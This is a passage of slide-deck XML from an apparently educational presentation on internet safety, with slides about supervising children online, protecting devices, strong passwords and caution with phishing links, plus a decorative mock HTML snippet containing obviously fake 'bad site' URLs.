            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5521725" y="2956350"/>
            <a:ext cx="3028950" cy="1514475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="306" name="Google Shape;306;p16" descr="Картинки по запросу Kids &amp; the Internet"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1189288" y="2411750"/>
            <a:ext cx="2193525" cy="1687975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="307" name="Google Shape;307;p16" descr="Картинки по запросу Kids &amp; the Internet"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6743975" y="340400"/>
            <a:ext cx="2362200" cy="1638300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Google Shape;308;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="930375" y="1685750"/>
            <a:ext cx="2813700" cy="726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sz="1800">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>Be careful when your kids uses the internet.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Nunito"/>
              <a:ea typeface="Nunito"/>
              <a:cs typeface="Nunito"/>
              <a:sym typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="309" name="Google Shape;309;p16" descr="Картинки по запросу kids logo"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="37394"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="128600" y="98325"/>
            <a:ext cx="1027342" cy="500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Keep an eye on mobiles and tablets </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="315" name="Google Shape;315;p17" descr="Картинки по запросу mobiles and tablets logo"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7775802" y="621712"/>
            <a:ext cx="953025" cy="953025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="316" name="Google Shape;316;p17" descr="Картинки по запросу mobiles and tablets logo"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="756400" y="2579275"/>
            <a:ext cx="2619375" cy="1743075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Google Shape;317;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378200" y="2060575"/>
            <a:ext cx="3872700" cy="365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a:latin typeface="Maven Pro Medium"/>
                <a:ea typeface="Maven Pro Medium"/>
                <a:cs typeface="Maven Pro Medium"/>
                <a:sym typeface="Maven Pro Medium"/>
              </a:rPr>
              <a:t>You need to protect your personal gadgets</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Maven Pro Medium"/>
              <a:ea typeface="Maven Pro Medium"/>
              <a:cs typeface="Maven Pro Medium"/>
              <a:sym typeface="Maven Pro Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="318" name="Google Shape;318;p17" descr="Картинки по запросу mobiles and tablets logo"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5419000" y="2496125"/>
            <a:ext cx="2998525" cy="1681325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="319" name="Google Shape;319;p17" descr="Картинки по запросу Keep an eye"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="60525" y="121025"/>
            <a:ext cx="846000" cy="562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ru"/>
              <a:t>Use secure passwords </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="325" name="Google Shape;325;p18" descr="Картинки по запросу password"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6951300" y="1424675"/>
            <a:ext cx="1550600" cy="1101725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="326" name="Google Shape;326;p18" descr="Картинки по запросу password"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1210225" y="3086075"/>
            <a:ext cx="1733550" cy="1733550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="327" name="Google Shape;327;p18" descr="Картинки по запросу password"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5135925" y="674575"/>
            <a:ext cx="431150" cy="431150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="328" name="Google Shape;328;p18" descr="Картинки по запросу password"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="75625" y="52975"/>
            <a:ext cx="1074900" cy="506225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Google Shape;329;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574875" y="2201100"/>
            <a:ext cx="2919600" cy="57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sz="1800">
                <a:latin typeface="Maven Pro Medium"/>
                <a:ea typeface="Maven Pro Medium"/>
                <a:cs typeface="Maven Pro Medium"/>
                <a:sym typeface="Maven Pro Medium"/>
              </a:rPr>
              <a:t>Your need to have a long and strong password</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Maven Pro Medium"/>
              <a:ea typeface="Maven Pro Medium"/>
              <a:cs typeface="Maven Pro Medium"/>
              <a:sym typeface="Maven Pro Medium"/>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Be careful when opening links </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="335" name="Google Shape;335;p19" descr="Картинки по запросу links"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="740675" y="3343325"/>
            <a:ext cx="1709600" cy="1280550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="336" name="Google Shape;336;p19" descr="Картинки по запросу links"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="121000" y="105900"/>
            <a:ext cx="619675" cy="619675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="337" name="Google Shape;337;p19" descr="Картинки по запросу links"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6801675" y="275829"/>
            <a:ext cx="1889325" cy="944675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Google Shape;338;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121000" y="1597875"/>
            <a:ext cx="3381000" cy="1616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a:latin typeface="Maven Pro Medium"/>
                <a:ea typeface="Maven Pro Medium"/>
                <a:cs typeface="Maven Pro Medium"/>
                <a:sym typeface="Maven Pro Medium"/>
              </a:rPr>
              <a:t>Links have a large amount of information but not all is good, there are links that lead to a phishing site.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Maven Pro Medium"/>
              <a:ea typeface="Maven Pro Medium"/>
              <a:cs typeface="Maven Pro Medium"/>
              <a:sym typeface="Maven Pro Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Maven Pro Medium"/>
              <a:ea typeface="Maven Pro Medium"/>
              <a:cs typeface="Maven Pro Medium"/>
              <a:sym typeface="Maven Pro Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru">
                <a:latin typeface="Maven Pro Medium"/>
                <a:ea typeface="Maven Pro Medium"/>
                <a:cs typeface="Maven Pro Medium"/>
                <a:sym typeface="Maven Pro Medium"/>
              </a:rPr>
              <a:t>Some websites can use </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Maven Pro Medium"/>
              <a:ea typeface="Maven Pro Medium"/>
              <a:cs typeface="Maven Pro Medium"/>
              <a:sym typeface="Maven Pro Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru">
                <a:latin typeface="Maven Pro Medium"/>
                <a:ea typeface="Maven Pro Medium"/>
                <a:cs typeface="Maven Pro Medium"/>
                <a:sym typeface="Maven Pro Medium"/>
              </a:rPr>
              <a:t>your PC for making money in background</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Maven Pro Medium"/>
              <a:ea typeface="Maven Pro Medium"/>
              <a:cs typeface="Maven Pro Medium"/>
              <a:sym typeface="Maven Pro Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="Google Shape;339;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3309000" y="1357250"/>
            <a:ext cx="5835000" cy="3714900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="57150" dist="76200" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="DD7E6B">
                <a:alpha val="42000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="108000" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="BF9000"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1">
              <a:latin typeface="Nunito"/>
              <a:ea typeface="Nunito"/>
              <a:cs typeface="Nunito"/>
              <a:sym typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4572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head&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1">
              <a:solidFill>
                <a:srgbClr val="741B47"/>
              </a:solidFill>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style</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style</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link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>all.bad.sites.do/not/open/?family=Virus:300,400,500,700|</a:t>
            </a:r>
            <a:endParaRPr sz="900" u="sng">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:latin typeface="Nunito"/>
              <a:ea typeface="Nunito"/>
              <a:cs typeface="Nunito"/>
              <a:sym typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>Sans:400,500</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>text/css</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meta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="BF9000"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t> = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900">
                <a:solidFill>
                  <a:srgbClr val="85200C"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>bad_link</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link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900">
                <a:solidFill>
                  <a:srgbClr val="85200C"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>bad/text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>UTF - 8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" u="sng">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>xttpc://vvv.money.gold.som/os/hacker/attack_tt6jku</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style</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style</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style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="900" b="1">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
